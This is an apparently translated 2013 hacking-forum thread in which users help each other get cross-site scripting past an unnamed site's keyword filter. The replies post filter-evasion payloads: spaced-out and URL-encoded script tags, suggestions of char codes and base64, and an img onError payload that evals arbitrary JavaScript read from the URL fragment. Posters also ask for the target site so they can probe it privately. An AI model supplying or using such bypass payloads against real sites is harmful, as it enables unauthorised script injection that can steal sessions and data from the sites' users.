XSS filter

Discussion in 'Vulnerabilities' started by Onths, 14 Feb 2013.

  1. Onths

    Onths New Member

    The filter cuts and inserts characters/spaces.

    <sc ript>a lert()</sc ript>

    Now this:

    <IMG SRC="jav ascript:alert('XSS');">

    <IMG SRC="jav * ascript:a lert('XSS');">

    Maybe someone has experience with this.
     
    #1 Onths, 14 Feb 2013
    Last edited: 14 Feb 2013
  2. FryTvin

    FryTvin New Member

    Try char code.
     
  3. RoksHD

    RoksHD New Member

    +1

    <script>alert(/XSS/)</script>

    %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2f%58%53%53%2f%29%3c%2f%73%63%72%69%70%74%3e
     
  4. boortyhuhtyu

    boortyhuhtyu Member

    base64 sometimes helps.
     
  5. Onths

    Onths New Member

    It converts and cuts.
     
  6. Onths

    Onths New Member

    In base it cuts data: d ata
     
  7. |qbz|

    |qbz| Banned

    <img src="#$@#*$&" onError="eval(decodeURIComponent(location.href).split('#')[1])" />

    + Add to the address bar:

    #your JavaScript code here
     
    #7 |qbz|, 14 Feb 2013
    Last edited: 14 Feb 2013
    1 person likes this.
  8. Onths

    Onths New Member


    No reaction at all, which is rather strange given the strict filtering.
     
  9. FryTvin

    FryTvin New Member

    What about SQL-code format? 0x ???
     
  10. randman

    randman Members of Antichat

    What is this nonsense in the thread? Post an example site here, or I can look at it via PM. Nobody is going to hack it.
     
  11. Улыбайся

    Can you tell me what can be done here?
    http://i078.radikal.ru/1303/14/ec62f094706e.png
     
  12. randman

    randman Members of Antichat

    An exact answer needs the site. The Joomla module is com_cabinet; I just checked it on several sites and saw no XSS there.
     
    #12 randman, 3 Mar 2013
    Last edited: 3 Mar 2013